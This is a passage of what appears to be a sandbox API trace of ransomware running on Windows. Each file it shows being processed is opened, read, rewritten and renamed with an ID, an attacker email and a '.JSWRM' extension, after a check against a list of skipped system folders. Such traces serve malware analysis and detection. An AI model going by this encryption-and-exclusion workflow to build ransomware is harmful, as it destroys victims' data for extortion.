lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.395] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6474) returned 1 [0091.395] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1940) returned 0x205850 [0091.395] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1940, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1940, lpOverlapped=0x0) returned 1 [0091.397] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.397] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1940, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1940, lpOverlapped=0x0) returned 1 [0091.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.397] CloseHandle (hObject=0x314) returned 1 [0091.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0091.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0091.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0091.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0091.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0091.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.398] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00395_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00395_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0091.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.399] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38c6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00396_.WMF", cAlternateFileName="")) returned 1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2=".") returned 1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2="..") returned 1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2="...") returned 1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2="windows") returned -1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2="recovery") returned -1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2="perflogs") returned -1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2="documents and settings") returned 1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2="system volume information") returned -1 [0091.399] lstrcmpiW (lpString1="NA00396_.WMF", lpString2="msocache") returned 1 [0091.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0091.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00396_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00396_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00396_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0091.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0091.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00396_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00396_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00396_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0091.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0091.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0091.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0091.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00396_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.400] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14534) returned 1 [0091.400] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x38c0) returned 0x24d210 [0091.400] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x38c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x38c0, lpOverlapped=0x0) returned 1 [0091.403] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.403] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x38c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x38c0, lpOverlapped=0x0) returned 1 [0091.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.403] CloseHandle (hObject=0x314) returned 1 [0091.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0091.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0091.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0091.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0091.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0091.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0091.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.403] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00396_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00396_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00396_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0091.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0091.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0091.404] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x173e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00417_.WMF", cAlternateFileName="")) returned 1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2=".") returned 1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2="..") returned 1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2="...") returned 1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2="windows") returned -1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2="recovery") returned -1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2="perflogs") returned -1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2="documents and settings") returned 1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2="system volume information") returned -1 [0091.404] lstrcmpiW (lpString1="NA00417_.WMF", lpString2="msocache") returned 1 [0091.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00417_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00417_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00417_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0091.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00417_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00417_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00417_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0091.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0091.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0091.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00417_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.405] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5950) returned 1 [0091.405] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1730) returned 0x205850 [0091.405] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1730, lpOverlapped=0x0) returned 1 [0091.407] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.407] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1730, lpOverlapped=0x0) returned 1 [0091.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.407] CloseHandle (hObject=0x314) returned 1 [0091.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0091.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0091.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0091.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0091.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0091.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.408] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00417_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00417_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00417_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0091.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.409] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4696, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00433_.WMF", cAlternateFileName="")) returned 1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2=".") returned 1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2="..") returned 1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2="...") returned 1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2="windows") returned -1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2="recovery") returned -1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2="perflogs") returned -1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2="documents and settings") returned 1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2="system volume information") returned -1 [0091.409] lstrcmpiW (lpString1="NA00433_.WMF", lpString2="msocache") returned 1 [0091.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0091.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00433_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00433_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00433_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0091.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0091.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00433_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00433_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00433_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0091.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0091.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0091.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00433_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00433_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.410] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18070) returned 1 [0091.410] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4690) returned 0x24d210 [0091.410] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4690, lpOverlapped=0x0) returned 1 [0091.412] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.412] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4690, lpOverlapped=0x0) returned 1 [0091.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.413] CloseHandle (hObject=0x314) returned 1 [0091.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.413] MultiByteToWideChar (in: 